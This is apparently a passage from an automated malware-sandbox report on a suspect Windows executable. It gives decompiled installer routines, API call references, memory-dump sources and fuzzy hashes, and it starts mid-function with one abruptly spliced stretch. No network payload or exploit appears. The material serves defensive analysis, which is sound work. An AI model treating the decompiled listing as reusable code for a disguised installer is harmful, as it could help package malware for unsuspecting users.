                                                                                    					}
                                                                                    					_a8 = 0x40f;
                                                                                    					goto L12;
                                                                                    				} else {
                                                                                    					_t165 = GetDlgItem(_t166, 0x3fb);
                                                                                    					if(E00405727(_t146) != 0 && E0040574E(_t146) == 0) {
                                                                                    						E004056BA(_t146);
                                                                                    					}
                                                                                    					 *0x42e3f8 = _t166;
                                                                                    					SetWindowTextA(_t165, _t146);
                                                                                    					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                    					_push(1);
                                                                                    					E00403E83(_t166);
                                                                                    					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                    					_push(0x14);
                                                                                    					E00403E83(_t166);
                                                                                    					E00403EB8(_t165);
                                                                                    					_t138 = E00405F57(0xa);
                                                                                    					if(_t138 == 0) {
                                                                                    						L53:
                                                                                    						return E00403EEA(_a8, _a12, _a16);
                                                                                    					} else {
                                                                                    						 *_t138(_t165, 1);
                                                                                    						goto L8;
                                                                                    					}
                                                                                    				}
                                                                                    			}


                                                                                    APIs
                                                                                    • GetDlgItem.USER32 ref: 00404310
                                                                                    • SetWindowTextA.USER32(00000000,?), ref: 0040433A
                                                                                    • SHBrowseForFolderA.SHELL32(?,00429470,?), ref: 004043EB
                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 004043F6
                                                                                    • lstrcmpiA.KERNEL32(Fdskdfkdsfsdfdsf,0042A0A0,00000000,?,?), ref: 00404428
                                                                                    • lstrcatA.KERNEL32(?,Fdskdfkdsfsdfdsf), ref: 00404434
                                                                                    • SetDlgItemTextA.USER32 ref: 00404446
                                                                                      • Part of subcall function 0040546C: GetDlgItemTextA.USER32 ref: 0040547F
                                                                                      • Part of subcall function 00405E29: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Nz7NA3F7z7.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                                                                                      • Part of subcall function 00405E29: CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                                                                                      • Part of subcall function 00405E29: CharNextA.USER32(?,"C:\Users\user\Desktop\Nz7NA3F7z7.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                                                                                      • Part of subcall function 00405E29: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                                                                                    • GetDiskFreeSpaceA.KERNEL32(00429068,?,?,0000040F,?,00429068,00429068,?,00000001,00429068,?,?,000003FB,?), ref: 00404504
                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040451F
                                                                                      • Part of subcall function 00404678: lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                                                                                      • Part of subcall function 00404678: wsprintfA.USER32 ref: 0040471E
                                                                                      • Part of subcall function 00404678: SetDlgItemTextA.USER32 ref: 00404731
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: A$C:\Users\user\AppData\Local\Temp$Fdskdfkdsfsdfdsf
                                                                                    • API String ID: 2624150263-2549951172
                                                                                    • Opcode ID: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                                                                                    • Instruction ID: 171edb992a826102812884c43759f415235567a44aa7ca021352bae990107689
                                                                                    • Opcode Fuzzy Hash: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                                                                                    • Instruction Fuzzy Hash: 6CA16FB1900208ABDB11AFA5DC41BAF77B8EF84315F14803BF615B62D1D77C9A418F69
                                                                                    Uniqueness
                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 74%
                                                                                    			E00402053() {
                                                                                    				void* _t44;
                                                                                    				intOrPtr* _t48;
                                                                                    				intOrPtr* _t50;
                                                                                    				intOrPtr* _t52;
                                                                                    				intOrPtr* _t54;
                                                                                    				signed int _t58;
                                                                                    				intOrPtr* _t59;
                                                                                    				intOrPtr* _t62;
                                                                                    				intOrPtr* _t64;
                                                                                    				intOrPtr* _t66;
                                                                                    				intOrPtr* _t69;
                                                                                    				intOrPtr* _t71;
                                                                                    				int _t75;
                                                                                    				signed int _t81;
                                                                                    				intOrPtr* _t88;
                                                                                    				void* _t95;
                                                                                    				void* _t96;
                                                                                    				void* _t100;
                                                                                    
                                                                                    				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
                                                                                    				_t96 = E00402A29(0xffffffdf);
                                                                                    				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
                                                                                    				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
                                                                                    				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
                                                                                    				if(E00405727(_t96) == 0) {
                                                                                    					E00402A29(0x21);
                                                                                    				}
                                                                                    				_t44 = _t100 + 8;
                                                                                    				__imp__CoCreateInstance(0x407504, _t75, 1, 0x4074f4, _t44);
                                                                                    				if(_t44 < _t75) {
                                                                                    					L13:
                                                                                    					 *((intOrPtr*)(_t100 - 4)) = 1;
                                                                                    					_push(0xfffffff0);
                                                                                    				} else {
                                                                                    					_t48 =  *((intOrPtr*)(_t100 + 8));
                                                                                    					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407514, _t100 - 8);
                                                                                    					if(_t95 >= _t75) {
                                                                                    						_t52 =  *((intOrPtr*)(_t100 + 8));
                                                                                    						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                                                                    						_t54 =  *((intOrPtr*)(_t100 + 8));
                                                                                    						 *((intOrPtr*)( *_t54 + 0x24))(_t54, 0x434800);
                                                                                    						_t81 =  *(_t100 - 0x18);
                                                                                    						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                                                                    						if(_t58 != 0) {
                                                                                    							_t88 =  *((intOrPtr*)(_t100 + 8));
                                                                                    							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                                                                    							_t81 =  *(_t100 - 0x18);
                                                                                    						}
                                                                                    						_t59 =  *((intOrPtr*)(_t100 + 8));
                                                                                    						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                                                                    						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
                                                                                    							_t71 =  *((intOrPtr*)(_t100 + 8));
                                                                                    							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
                                                                                    						}
                                                                                    						_t62 =  *((intOrPtr*)(_t100 + 8));
                                                                                    						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
                                                                                    						_t64 =  *((intOrPtr*)(_t100 + 8));
                                                                                    						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
                                                                                    						if(_t95 >= _t75) {
                                                                                    							_t95 = 0x80004005;
                                                                                    							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409438, 0x400) != 0) {
                                                                                    								_t69 =  *((intOrPtr*)(_t100 - 8));
                                                                                    								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409438, 1);
                                                                                    							}
                                                                                    						}
                                                                                    						_t66 =  *((intOrPtr*)(_t100 - 8));
                                                                                    						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                                                                    					}
                                                                                    					_t50 =  *((intOrPtr*)(_t100 + 8));
                                                                                    					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                                                                    					if(_t95 >= _t75) {
                                                                                    						_push(0xfffffff4);
                                                                                    					} else {
                                                                                    						goto L13;
                                                                                    					}
                                                                                    				}
                                                                                    				E00401423();
                                                                                    				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t100 - 4));
                                                                                    				return 0;
                                                                                    			}

                                                                                    0x0040205c, 0x00402066, 0x0040206f, 0x00402079, 0x00402082, 0x0040208c, 0x00402090, 0x00402090, 0x00402095, 0x004020a6, 0x004020ae, 0x0040218e, 0x0040218e, 0x00402195, 0x004020b4, 0x004020b4, 0x004020c5, 0x004020c9, 0x004020cf, 0x004020d9, 0x004020db, 0x004020e6, 0x004020e9, 0x004020f6, 0x004020f8, 0x004020fa, 0x00402101, 0x00402104, 0x00402104, 0x00402107, 0x00402111, 0x00402119, 0x0040211e, 0x0040212a, 0x0040212a, 0x0040212d, 0x00402136, 0x00402139, 0x00402142, 0x00402147, 0x00402159, 0x00402168, 0x0040216a, 0x00402176, 0x00402176, 0x00402168, 0x00402178, 0x0040217e, 0x0040217e, 0x00402181, 0x00402187, 0x0040218c, 0x004021a1, 0x00000000, 0x00000000, 0x00000000, 0x0040218c, 0x00402197, 0x004028c1, 0x004028cd

                                                                                    APIs
                                                                                    • CoCreateInstance.OLE32(00407504,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409438,00000400,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: ByteCharCreateInstanceMultiWide
                                                                                    • String ID:
                                                                                    • API String ID: 123533781-0
                                                                                    • Opcode ID: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
                                                                                    • Instruction ID: 8f67ba42191d57eba63015a6e8d0bffc44353c0eb35145c2afa1481ff4163fd5
                                                                                    • Opcode Fuzzy Hash: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
                                                                                    • Instruction Fuzzy Hash: 2D414C75A00205BFCB00DFA8CD89E9E7BB6EF49354F204169FA05EB2D1CA799C41CB94
                                                                                    Uniqueness
                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 39%
                                                                                    			E00402671(char __ebx, char* __edi, char* __esi) {
                                                                                    				void* _t19;
                                                                                    
                                                                                    				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
                                                                                    					E00405B25(__edi, _t6);
                                                                                    					_push(_t19 - 0x170);
                                                                                    					_push(__esi);
                                                                                    					E00405BC7();
                                                                                    				} else {
                                                                                    					 *__edi = __ebx;
                                                                                    					 *__esi = __ebx;
                                                                                    					 *((intOrPtr*)(_t19 - 4)) = 1;
                                                                                    				}
                                                                                    				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t19 - 4));
                                                                                    				return 0;
                                                                                    			}

                                                                                    0x00402689, 0x0040269d, 0x004026a8, 0x004026a9, 0x004027e4, 0x0040268b, 0x0040268b, 0x0040268d, 0x0040268f, 0x0040268f, 0x004028c1, 0x004028cd

                                                                                    APIs
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: FileFindFirst
                                                                                    • String ID:
                                                                                    • API String ID: 1974802433-0
                                                                                    • Opcode ID: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
                                                                                    • Instruction ID: d100cd6159f555773fbda265320c1ac67d2490096a0530dc8ee4140695772295
                                                                                    • Opcode Fuzzy Hash: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
                                                                                    • Instruction Fuzzy Hash: 24F0A0326081049ED711EBA99A499EEB778DB11328F6045BFE101B61C1C7B859459A3A
                                                                                    Uniqueness
                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 79%
                                                                                    			E00406354(signed int __ebx, signed int* __esi) {
                                                                                    				signed int _t396;
                                                                                    				signed int _t425;
                                                                                    				signed int _t442;
                                                                                    				signed int _t443;
                                                                                    				signed int* _t446;
                                                                                    				void* _t448;
                                                                                    
                                                                                    				L0:
                                                                                    				while(1) {
                                                                                    					L0:
                                                                                    					_t446 = __esi;
                                                                                    					_t425 = __ebx;
                                                                                    					if( *(_t448 - 0x34) == 0) {
                                                                                    						break;
                                                                                    					}
                                                                                    					L55:
                                                                                    					__eax =  *(__ebp - 0x38);
                                                                                    					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    					__ecx = __ebx;
                                                                                    					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    					__ebx = __ebx + 8;
                                                                                    					while(1) {
                                                                                    						L56:
                                                                                    						if(__ebx < 0xe) {
                                                                                    							goto L0;
                                                                                    						}
                                                                                    						L57:
                                                                                    						__eax =  *(__ebp - 0x40);
                                                                                    						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                                                    						__ecx = __eax;
                                                                                    						__esi[1] = __eax;
                                                                                    						__ecx = __eax & 0x0000001f;
                                                                                    						if(__cl > 0x1d) {
                                                                                    							L9:
                                                                                    							_t443 = _t442 | 0xffffffff;
                                                                                    							 *_t446 = 0x11;
                                                                                    							L10:
                                                                                    							_t446[0x147] =  *(_t448 - 0x40);
                                                                                    							_t446[0x146] = _t425;
                                                                                    							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                                                    							L11:
                                                                                    							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                                                    							_t446[0x26ea] =  *(_t448 - 0x30);
                                                                                    							E00406AC3( *(_t448 + 8));
                                                                                    							return _t443;
                                                                                    						}
                                                                                    						L58:
                                                                                    						__eax = __eax & 0x000003e0;
                                                                                    						if(__eax > 0x3a0) {
                                                                                    							goto L9;
                                                                                    						}
                                                                                    						L59:
                                                                                    						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                                                    						__ebx = __ebx - 0xe;
                                                                                    						_t94 =  &(__esi[2]);
                                                                                    						 *_t94 = __esi[2] & 0x00000000;
                                                                                    						 *__esi = 0xc;
                                                                                    						while(1) {
                                                                                    							L60:
                                                                                    							__esi[1] = __esi[1] >> 0xa;
                                                                                    							__eax = (__esi[1] >> 0xa) + 4;
                                                                                    							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                    								goto L68;
                                                                                    							}
                                                                                    							L61:
                                                                                    							while(1) {
                                                                                    								L64:
                                                                                    								if(__ebx >= 3) {
                                                                                    									break;
                                                                                    								}
                                                                                    								L62:
                                                                                    								if( *(__ebp - 0x34) == 0) {
                                                                                    									goto L182;
                                                                                    								}
                                                                                    								L63:
                                                                                    								__eax =  *(__ebp - 0x38);
                                                                                    								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    								__ecx = __ebx;
                                                                                    								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    								__ebx = __ebx + 8;
                                                                                    							}
                                                                                    							L65:
                                                                                    							__ecx = __esi[2];
                                                                                    							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
                                                                                    							__ebx = __ebx - 3;
                                                                                    							_t108 = __ecx + 0x4073e8; // 0x121110
                                                                                    							__ecx =  *_t108;
                                                                                    							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
                                                                                    							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
                                                                                    							__ecx = __esi[1];
                                                                                    							__esi[2] = __esi[2] + 1;
                                                                                    							__eax = __esi[2];
                                                                                    							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
                                                                                    							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
                                                                                    								goto L64;
                                                                                    							}
                                                                                    							L66:
                                                                                    							while(1) {
                                                                                    								L68:
                                                                                    								if(__esi[2] >= 0x13) {
                                                                                    									break;
                                                                                    								}
                                                                                    								L67:
                                                                                    								_t119 = __esi[2] + 0x4073e8; // 0x4000300
                                                                                    								__eax =  *_t119;
                                                                                    								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
                                                                                    								_t126 =  &(__esi[2]);
                                                                                    								 *_t126 = __esi[2] + 1;
                                                                                    							}
                                                                                    							L69:
                                                                                    							__ecx = __ebp - 8;
                                                                                    							__edi =  &(__esi[0x143]);
                                                                                    							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                                                    							__eax = 0;
                                                                                    							 *(__ebp - 8) = 0;
                                                                                    							__eax =  &(__esi[3]);
                                                                                    							 *__edi = 7;
                                                                                    							__eax = E00406B2B( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                                                    							if(__eax != 0) {
                                                                                    								L72:
                                                                                    								 *__esi = 0x11;
                                                                                    								while(1) {
                                                                                    									L180:
                                                                                    									_t396 =  *_t446;
                                                                                    									if(_t396 > 0xf) {
                                                                                    										break;
                                                                                    									}
                                                                                    									L1:
                                                                                    									switch( *((intOrPtr*)(_t396 * 4 +  &M00406A83))) {
                                                                                    										case 0:
                                                                                    											L101:
                                                                                    											__eax = __esi[4] & 0x000000ff;
                                                                                    											__esi[3] = __esi[4] & 0x000000ff;
                                                                                    											__eax = __esi[5];
                                                                                    											__esi[2] = __esi[5];
                                                                                    											 *__esi = 1;
                                                                                    											goto L102;
                                                                                    										case 1:
                                                                                    											L102:
                                                                                    											__eax = __esi[3];
                                                                                    											while(1) {
                                                                                    												L105:
                                                                                    												__eflags = __ebx - __eax;
                                                                                    												if(__ebx >= __eax) {
                                                                                    													break;
                                                                                    												}
                                                                                    												L103:
                                                                                    												__eflags =  *(__ebp - 0x34);
                                                                                    												if( *(__ebp - 0x34) == 0) {
                                                                                    													goto L182;
                                                                                    												}
                                                                                    												L104:
                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                    												__ecx = __ebx;
                                                                                    												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    												__ebx = __ebx + 8;
                                                                                    												__eflags = __ebx;
                                                                                    											}
                                                                                    											L106:
                                                                                    											__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
                                                                                    											__eax = __eax &  *(__ebp - 0x40);
                                                                                    											__ecx = __esi[2];
                                                                                    											__eax = __esi[2] + __eax * 4;
                                                                                    											__ecx =  *(__eax + 1) & 0x000000ff;
                                                                                    											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                    											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                                                    											__ecx =  *__eax & 0x000000ff;
                                                                                    											__eflags = __ecx;
                                                                                    											if(__ecx != 0) {
                                                                                    												L108:
                                                                                    												__eflags = __cl & 0x00000010;
                                                                                    												if((__cl & 0x00000010) == 0) {
                                                                                    													L110:
                                                                                    													__eflags = __cl & 0x00000040;
                                                                                    													if((__cl & 0x00000040) == 0) {
                                                                                    														goto L125;
                                                                                    													}
                                                                                    													L111:
                                                                                    													__eflags = __cl & 0x00000020;
                                                                                    													if((__cl & 0x00000020) == 0) {
                                                                                    														goto L9;
                                                                                    													}
                                                                                    													L112:
                                                                                    													 *__esi = 7;
                                                                                    													goto L180;
                                                                                    												}
                                                                                    												L109:
                                                                                    												__esi[2] = __ecx;
                                                                                    												__esi[1] = __eax;
                                                                                    												 *__esi = 2;
                                                                                    												goto L180;
                                                                                    											}
                                                                                    											L107:
                                                                                    											__esi[2] = __eax;
                                                                                    											 *__esi = 6;
                                                                                    											goto L180;
                                                                                    										case 2:
                                                                                    											L113:
                                                                                    											__eax = __esi[2];
                                                                                    											while(1) {
                                                                                    												L116:
                                                                                    												__eflags = __ebx - __eax;
                                                                                    												if(__ebx >= __eax) {
                                                                                    													break;
                                                                                    												}
                                                                                    												L114:
                                                                                    												__eflags =  *(__ebp - 0x34);
                                                                                    												if( *(__ebp - 0x34) == 0) {
                                                                                    													goto L182;
                                                                                    												}
                                                                                    												L115:
                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                    												__ecx = __ebx;
                                                                                    												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    												__ebx = __ebx + 8;
                                                                                    												__eflags = __ebx;
                                                                                    											}
                                                                                    											L117:
                                                                                    											 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                    											__esi[1] = __esi[1] + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                    											__ecx = __eax;
                                                                                    											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                    											__ebx = __ebx - __eax;
                                                                                    											__eflags = __ebx;
                                                                                    											__eax = __esi[4] & 0x000000ff;
                                                                                    											__esi[3] = __esi[4] & 0x000000ff;
                                                                                    											__eax = __esi[6];
                                                                                    											__esi[2] = __esi[6];
                                                                                    											 *__esi = 3;
                                                                                    											goto L118;
                                                                                    										case 3:
                                                                                    											L118:
                                                                                    											__eax = __esi[3];
                                                                                    											while(1) {
                                                                                    												L121:
                                                                                    												__eflags = __ebx - __eax;
                                                                                    												if(__ebx >= __eax) {
                                                                                    													break;
                                                                                    												}
                                                                                    												L119:
                                                                                    												__eflags =  *(__ebp - 0x34);
                                                                                    												if( *(__ebp - 0x34) == 0) {
                                                                                    													goto L182;
                                                                                    												}
                                                                                    												L120:
                                                                                    												__ecx =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                    												__ecx = __ebx;
                                                                                    												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    													_t446[4] = _t413;
                                                                                    													_t414 =  *0x42ca34; // 0x0
                                                                                    													_t446[5] = _t414;
                                                                                    													_t415 =  *0x42ca30; // 0x0
                                                                                    													_t446[6] = _t415;
                                                                                    													L23:
                                                                                    													 *_t446 =  *_t446 & 0x00000000;
                                                                                    													goto L180;
                                                                                    												} else {
                                                                                    													_t26 = _t448 - 8;
                                                                                    													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                                                    													__eflags =  *_t26;
                                                                                    													_t416 = 0x42ca38;
                                                                                    													goto L15;
                                                                                    													L20:
                                                                                    													 *_t416 = _t438;
                                                                                    													_t416 = _t416 + 4;
                                                                                    													__eflags = _t416 - 0x42ceb8;
                                                                                    													if(_t416 < 0x42ceb8) {
                                                                                    														L15:
                                                                                    														__eflags = _t416 - 0x42cc74;
                                                                                    														_t438 = 8;
                                                                                    														if(_t416 > 0x42cc74) {
                                                                                    															__eflags = _t416 - 0x42ce38;
                                                                                    															if(_t416 >= 0x42ce38) {
                                                                                    																__eflags = _t416 - 0x42ce98;
                                                                                    																if(_t416 < 0x42ce98) {
                                                                                    																	_t438 = 7;
                                                                                    																}
                                                                                    															} else {
                                                                                    																_t438 = 9;
                                                                                    															}
                                                                                    														}
                                                                                    														goto L20;
                                                                                    													} else {
                                                                                    														E00406B2B(0x42ca38, 0x120, 0x101, 0x4073fc, 0x40743c, 0x42ca34, 0x40942c, 0x42d338, _t448 - 8);
                                                                                    														_push(0x1e);
                                                                                    														_pop(_t440);
                                                                                    														_push(5);
                                                                                    														_pop(_t419);
                                                                                    														memset(0x42ca38, _t419, _t440 << 2);
                                                                                    														_t450 = _t450 + 0xc;
                                                                                    														_t442 = 0x42ca38 + _t440;
                                                                                    														E00406B2B(0x42ca38, 0x1e, 0, 0x40747c, 0x4074b8, 0x42ca30, 0x409430, 0x42d338, _t448 - 8);
                                                                                    														 *0x42dbb8 =  *0x42dbb8 + 1;
                                                                                    														__eflags =  *0x42dbb8;
                                                                                    														goto L22;
                                                                                    													}
                                                                                    												}
                                                                                    											}
                                                                                    											L7:
                                                                                    											_t423 = _t411 - 1;
                                                                                    											if(_t423 == 0) {
                                                                                    												 *_t446 = 0xb;
                                                                                    												goto L180;
                                                                                    											}
                                                                                    											L8:
                                                                                    											if(_t423 != 1) {
                                                                                    												goto L180;
                                                                                    											}
                                                                                    											goto L9;
                                                                                    										case 9:
                                                                                    											while(1) {
                                                                                    												L27:
                                                                                    												__eflags = __ebx - 0x10;
                                                                                    												if(__ebx >= 0x10) {
                                                                                    													break;
                                                                                    												}
                                                                                    												L25:
                                                                                    												__eflags =  *(__ebp - 0x34);
                                                                                    												if( *(__ebp - 0x34) == 0) {
                                                                                    													goto L182;
                                                                                    												}
                                                                                    												L26:
                                                                                    												__eax =  *(__ebp - 0x38);
                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    												__ecx = __ebx;
                                                                                    												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    												__ebx = __ebx + 8;
                                                                                    												__eflags = __ebx;
                                                                                    											}
                                                                                    											L28:
                                                                                    											__eax =  *(__ebp - 0x40);
                                                                                    											__ebx = 0;
                                                                                    											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                                                    											 *(__ebp - 0x40) = 0;
                                                                                    											__eflags = __eax;
                                                                                    											__esi[1] = __eax;
                                                                                    											if(__eax == 0) {
                                                                                    												goto L53;
                                                                                    											}
                                                                                    											L29:
                                                                                    											_push(0xa);
                                                                                    											_pop(__eax);
                                                                                    											goto L54;
                                                                                    										case 0xa:
                                                                                    											L30:
                                                                                    											__eflags =  *(__ebp - 0x34);
                                                                                    											if( *(__ebp - 0x34) == 0) {
                                                                                    												goto L182;
                                                                                    											}
                                                                                    											L31:
                                                                                    											__eax =  *(__ebp - 0x2c);
                                                                                    											__eflags = __eax;
